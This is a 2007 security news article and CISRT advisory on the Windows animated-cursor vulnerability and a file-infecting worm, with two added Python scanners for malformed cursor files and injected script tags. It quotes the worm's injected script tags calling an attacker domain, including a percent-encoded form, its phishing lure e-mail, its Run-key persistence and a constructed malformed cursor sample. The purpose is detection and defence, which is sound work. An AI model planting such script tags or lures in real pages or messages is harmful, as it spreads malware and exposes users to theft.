Cursor vulnerability: complex worm appears, exposing the first major flaw in Vista

Source: Internet
Author: User

March 30: the Microsoft Vista operating system has had its first major vulnerability exposed. Yesterday, anti-virus experts at Rising found that the vulnerability is already being exploited by attackers: Windows Vista and XP users who visit a poisoned site are infected with the Viking worm, password-stealing Trojans and a range of other malware. According to Rising's monitoring, nearly 10 sites in China have been compromised.

Earlier, Microsoft had issued a warning that attackers were actively exploiting a vulnerability in the way Windows handles animated cursor (.ani) files. The vulnerability affects Windows XP and later, and IE6 and later browsers; Microsoft's newest Vista and IE7 are not spared. At the time of writing, Microsoft has not yet released a patch for this vulnerability.

According to Rising's security experts, ANI files are Windows animated mouse-cursor files. Because Vista and the other affected systems have a flaw in the way they process ANI files, an attacker can construct a specially crafted ANI file; when a user browses a web page containing the file, or opens the file directly, it silently downloads and runs the attacker's chosen viruses, Trojans and backdoors. Viking worm (Worm.Viking) variants and Trojans that steal online-game credentials make up the majority of the malware currently exploiting this vulnerability.

This is the first time Vista has had a major vulnerability exposed. The number of sites using it to spread malware is increasing, and the exploit code is likely to become public.

Security experts remind ordinary users not to casually visit unfamiliar websites, especially links sent by e-mail or chat software. Site administrators should strengthen their server log management, pay particular attention to ANI and JPG image files of unknown origin, and deal with anomalies as soon as they appear. Note that Windows recognises an animated cursor by its RIFF/ACON header rather than by its file extension, so a malicious cursor can be served under a .jpg or other innocuous name; checks based on extension alone are not sufficient.
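The flaw described above lies in the cursor loader: the animated-cursor header chunk ("anih") is a fixed 36-byte structure, and the loader copied the chunk using the length the file declared rather than checking it against that fixed size, so an oversized anih chunk overruns the structure. The following scanner is an added example written for this page (it is not Rising's tooling or anything from the original article). It parses the RIFF container by its header rather than by extension, walks the chunks, and flags any anih chunk whose declared length is not 36, any file with more than one anih chunk, and any chunk whose declared length runs past the end of the file. The two sample files are constructed inline for the demonstration and are not real malware; the "crafted" one only carries a second, oversized anih chunk with filler bytes.

```python
import struct

ANIH_SIZE = 36  # sizeof(ANIHEADER), the fixed-size structure the cursor loader fills from the chunk


def _iter_chunks(data, start, end):
    """Yield (fourcc, declared_size, payload_offset) for each RIFF chunk in data[start:end].

    Only the 8-byte chunk header is read; the declared size is never used to index into
    the buffer, so an absurd size cannot make the parser itself read out of bounds.
    """
    pos = start
    while pos + 8 <= end:
        fourcc = data[pos:pos + 4]
        size = struct.unpack_from('<I', data, pos + 4)[0]
        yield fourcc, size, pos + 8
        pos += 8 + size + (size & 1)  # chunk payloads are padded to an even length


def is_ani(data):
    """RIFF container whose form type is ACON: an animated cursor, whatever the extension says."""
    return len(data) >= 12 and data[:4] == b'RIFF' and data[8:12] == b'ACON'


def scan_ani(data):
    """Return a list of human-readable findings; an empty list means the file looks well-formed."""
    findings = []
    if not is_ani(data):
        return findings
    anih_count = 0
    pending = [(12, len(data))]  # (start, end) ranges still to walk; LIST chunks nest
    while pending:
        start, end = pending.pop()
        for fourcc, size, off in _iter_chunks(data, start, end):
            if off + size > len(data):
                findings.append('chunk %r declares %d bytes but only %d remain'
                                % (fourcc, size, len(data) - off))
            if fourcc == b'anih':
                anih_count += 1
                if size != ANIH_SIZE:
                    # This is the check the vulnerable loader did not make.
                    findings.append('anih chunk declares %d bytes, expected %d' % (size, ANIH_SIZE))
            elif fourcc == b'LIST' and size >= 4:
                pending.append((off + 4, min(off + size, len(data))))  # skip the 4-byte list type
    if anih_count == 0:
        findings.append('no anih chunk')
    elif anih_count > 1:
        findings.append('%d anih chunks; a well-formed cursor has exactly one' % anih_count)
    return findings


# --- constructed sample files for the demonstration (not real malware) ---

def chunk(fourcc, payload):
    pad = b'\0' if len(payload) & 1 else b''
    return fourcc + struct.pack('<I', len(payload)) + payload + pad


def build_ani(chunks):
    body = b'ACON' + b''.join(chunks)
    return b'RIFF' + struct.pack('<I', len(body)) + body


# ANIHEADER for a one-frame cursor: cbSizeof, cFrames, cSteps, cx, cy, cBitCount, cPlanes, JifRate, flags
ANIH = struct.pack('<9I', ANIH_SIZE, 1, 1, 0, 0, 0, 0, 1, 1)

BENIGN = build_ani([chunk(b'anih', ANIH),
                    chunk(b'LIST', b'fram' + chunk(b'icon', b'\0' * 16))])

# A valid first anih followed by a second, oversized one filled with 'A's.
CRAFTED = build_ani([chunk(b'anih', ANIH),
                     chunk(b'anih', b'A' * 0x100)])


if __name__ == '__main__':
    for name, sample in (('benign', BENIGN), ('crafted', CRAFTED), ('truncated', CRAFTED[:100])):
        print(name, scan_ani(sample) or 'clean')
```

To use it on a server, read each uploaded or unknown file as bytes and call scan_ani on it regardless of its name; is_ani returns False for genuine JPEGs, so ordinary images are skipped, while a cursor renamed to .jpg is still inspected.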

------------------CISRT Information------------------

Bad news: a new worm exploiting the Microsoft animated cursor vulnerability has appeared. We have received samples and, through analysis, confirmed that this is a complex worm with several capabilities: Panda Burning Incense-style file infection, downloading other malware, sending e-mails that link to the latest ANI exploit, and infecting HTML and other files by inserting a reference to that exploit. Because the risk is very high, CISRT Lab has decided to issue a moderate-risk warning again to remind users to stay vigilant.

We also recommend that users and enterprise network administrators block the following two domain names and IP address:

2007ip.com
Microfsot.com
61.153.247.76


The worm is about 13 KB in size and drops the following file:

%system%\sysload3.exe


It adds the following registry value:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run
"System Boot Check" = "%system%\sysload3.exe"


It sends the following e-mail:

From: i_love_cq@sohu.com
Subject: Who were you filmed with the video? I'll give you a laugh!
Body:
Look at your demo! I think you are famous!
You see this address! Your face is so clear! You've become a star!
http://macr.microfsot.com/<removed>/134952.htm


It infects .html, .aspx, .htm, .php, .jsp, .asp and .exe files, and implants the following code into the .html, .aspx, .htm, .php, .jsp and .asp files:

<script src=http://macr.microfsot.com/<removed>.js></script>
or
<script language="javascript" src="http://%6D%61%63%72%2e%6d%69%63%72%6f%66%73%6f%74%2e%63%6f%6d/<removed>.js"></script>

(The percent-encoded host name in the second form decodes to macr.microfsot.com, so a search of web files for the plain domain name will miss it.)


Note that the URLs in the e-mail and in the injected script tags point to a malicious file that exploits the .ANI 0-day vulnerability.
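Administrators checking a web root for the injected script tags above need to decode the percent-encoded host name before comparing it with the blocked domains, otherwise the second form slips through. The scanner below is an added example written for this page, not CISRT's tooling or code from the worm. It finds every script tag with a src attribute (tolerating the unquoted and space-padded forms seen in the injection), percent-decodes the URL, and reports a hit when the host is one of the blocked domains or a subdomain of one, or when the host itself was percent-encoded, which a legitimate page never does. The sample page is constructed inline; the script file name sample.js is a placeholder standing in for the removed name.

```python
import os
import re
from urllib.parse import unquote, urlsplit

# Domains the CISRT advisory recommends blocking.
BLOCKED_DOMAINS = {'2007ip.com', 'microfsot.com'}

# Web file types the worm implants script tags into (from the advisory).
INFECTED_EXTENSIONS = ('.html', '.htm', '.aspx', '.asp', '.php', '.jsp')

# <script ... src=VALUE ...>, with or without quotes, tolerating the stray spaces
# seen in the injected tag (src= "http://... ").
SCRIPT_SRC = re.compile(r'<script\b[^>]*?\bsrc\s*=\s*["\']?\s*([^"\'\s>]+)', re.IGNORECASE)


def is_blocked_host(host):
    """True for a blocked domain or any subdomain of it (e.g. macr.microfsot.com)."""
    return any(host == d or host.endswith('.' + d) for d in BLOCKED_DOMAINS)


def inspect_script_src(raw):
    """Classify one src value. Returns (decoded_host, reasons); empty reasons means nothing suspicious."""
    raw = raw.strip()
    reasons = []
    raw_host = urlsplit(raw).hostname or ''
    if '%' in raw_host:
        # The worm percent-encodes the host so a plain grep for the domain misses it.
        reasons.append('percent-encoded hostname')
    host = urlsplit(unquote(raw)).hostname or ''
    if is_blocked_host(host):
        reasons.append('blocked domain')
    return host, reasons


def find_injected_scripts(html):
    """Return one dict per suspicious <script src=...> tag in the page text."""
    hits = []
    for m in SCRIPT_SRC.finditer(html):
        host, reasons = inspect_script_src(m.group(1))
        if reasons:
            hits.append({'src': m.group(1).strip(), 'host': host, 'reasons': reasons})
    return hits


def scan_web_root(root):
    """Walk a web root and map each infected file path to its suspicious script tags."""
    report = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.lower().endswith(INFECTED_EXTENSIONS):
                path = os.path.join(dirpath, name)
                with open(path, 'r', encoding='utf-8', errors='replace') as fh:
                    hits = find_injected_scripts(fh.read())
                if hits:
                    report[path] = hits
    return report


# Constructed sample page: one legitimate local script plus both injected forms.
SAMPLE_PAGE = """<html><head>
<script src="/js/site.js"></script>
</head><body>
<p>Hello</p>
<script src=http://macr.microfsot.com/sample.js></script>
<script language= "javascript" src= "http://%6D%61%63%72%2e%6d%69%63%72%6f%66%73%6f%74%2e%63%6f%6d/sample.js "></script>
</body></html>"""


if __name__ == '__main__':
    for hit in find_injected_scripts(SAMPLE_PAGE):
        print(hit['host'], hit['reasons'], hit['src'])
```

Run scan_web_root against the document root to get a per-file list of hits; cleaning the tags out is only half the job, since the worm also infects .exe files and re-infects web files on each run, so the dropped sysload3.exe and its Run key have to go first.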

Kaspersky detects it as Trojan-Downloader.Win32.Agent.bky; Kingsoft Duba names it Worm.MyInfect.

The MD5 values of the samples we have received so far are:

99720c731d19512678d9594867024e7e
4ebca8337797302fc6003eb50dd6237d
e9100ce97a5b4fbd8857b25ffe2d7179


First update, 2007-03-31 22:45:

Inside the worm, its author expresses dissatisfaction with Kaspersky.
